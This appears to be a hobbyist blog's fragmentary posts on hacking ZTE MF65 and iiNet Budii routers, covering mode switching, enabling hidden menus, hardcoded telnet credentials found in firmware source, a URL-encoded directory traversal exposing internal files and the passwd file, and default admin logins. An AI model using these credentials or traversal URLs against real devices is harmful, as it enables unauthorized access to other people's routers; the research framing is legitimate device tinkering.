Franks Electric Dreams

///ZTE mf65 Mode Switch/// this page is uploaded to any web dir: UPDATED(2017) Download this file: mode.html Upload it to any directory and use it to switch thru modes via html Modes: factory_mode">Download Mode(DIAG+AT+MODEM) debug_mode">Debug Mode(RNDIS+DIAG+AT+MODEM) work_mode">Work Mode(RNDIS)  1. After you have selected and applyed the switch, check the page title for status, then refresh! To return to default mode Send AT+ZCDRUN=9 Then AT+ZCDRUN=F to COM(X) ZTE NMEA Device

///////ZTE MF65 -- Unlocking A Few More features (Fastboot) /mf65_efs/Secondary/web/js/config/ufi/mf65/menu.js  or /js/config/ufi/mf65/menu.js By changing the file that controls the menus we can enable/disable a few more options like: ((#phonebook)) #group_common #group_family #group_friend #group_colleague ((#status))  #STK #traffic_alert  #USSD ((#Wifi_setting)) #ap_station ((#device_setting)) #update_management #dlna_setting #fastboot ((#firewall )) #port_filter #port_forward #port_map #system_security #dmz #upnp we simply remove the commenting out and re upload the file and this will enable any function that has been left out; use/see previous methods for ways to do this if unsure [extra note] this file can also be used to disable the httpshare for guests this file can be used to either strengthen or weaken a routers structure and presentation to anyone able to access its the websev

iiNet Budii(1031) (Telnet Access) so telnet was always another open port available to us from the network, although it never responded to any login attempts even if we 100% knew the password and user was correct; This was solvable by one of two approaches. (1) The easiest by far was to simply grab the consumer release of the firmware, inside its folders is a compilable c file for telnet (they've named it telnetc) Budii1016_consumer_release/bcm963xx_4.12L.01_consumer /userspace/gpl/apps/telnetc  this is a pretty basic busybox telnet file a few modifications have been made over the years  one includes this little function     telnet_data_set_autheninfo(&g_telnet_data, "iismshamswii", "i20U18r4E3");     addr.s_addr = inet_addr("10.1.1.1");     telnet_data_set_serverinfo(&g_telnet_data, &addr, 23); meaning that iismshamswii will work as the username with i20U18r4E3 as the password so we have logged

In the last mf65 post  we covered the local file listing method  and briefly touched on the changes to the config file  for constant file listing for the sd card functions i managed to soft brick my device by directory transversal on the sd card base path basically the router would try and load the httpshare page, get to the share path and sd base path, ultimately just reading /mmc2/../ and it would just freak out and not load so it sat around for a while. Now im back and have a solution that,  fixes my problem and gives us access to the internal files we will need a windows machine (xp++)  QPST, the modem drivers and putty  (ZTE WCDMA technologies MSM issue ??) (if you cannot find the drivers keep looking they are around try dcunlocker support files(i had to try several drivers before my machine acknowledged them)) using :   /goform/goform_process?goformId=MODE_SWITCH&switchCmd=FACTORY  we get these devices ZTE Diagn

This is a method to list the local files on the router via wftp (USBwebsever) : Requires login and usb inserted into the aux usbports(fat/nfts)(*1) Either goto:   http://10.1.1.1/usb_wftp_server.html       Or  http://10.1.1.1/websrv_cfg.cmd?action=save&wftp_enable=1&wftp_remote=0&port=8000&path=*&partitionindex=1&disk_index=0&disk_name=sdb (you may need to use Ui to turn this on)  To turn on the fileserver, now point your browser here:        http://10.1.1.1/usb_wftp_tree.cmd?diskname=..%2f..%2f    (notice the URLencode because the straight transversal is rejected by the websever not even making its way to the app  but with encoded slashes we beat the checks)   and click save  now we goto: http://10.1.1.1:8000  And we see our routers internal files. we can wget out a copy of the systems memory with this enabled and scrape/view many of the files including the passwd file in the web browser:

Opening the case we find a internal usb, we can also see a altera max jtag breakout, a large set of gpio pins and a UART breakout. connecting to the uart and booting we can see the modem is running a broadcom firmware  [bootlog.samp] CFE version 1.0.38-112.118 for BCM96362 (32bit,SP,BE) Build Date: Fri Dec 6 11:09:42 CST 2013 (root@Ayecom) Copyright (C) 2000-2011 Broadcom Corporation.  ** Chip ID: BCM6362B0, MIPS: 400MHz, DDR: 333MHz, Bus: 166MHz  ** Total Memory: 134217728 bytes (128MB) Default host run file name : vmlinux Default host flash file name : bcm963xx_fs_kernel [/bootlog.samp] the user names available to us are: (user:admin/password:admin) (user:user/password:user)    upon logging in we are brought into a console(d), the commands available to admin are : [?.samp] help           logout      exit       quit     reboot       adsl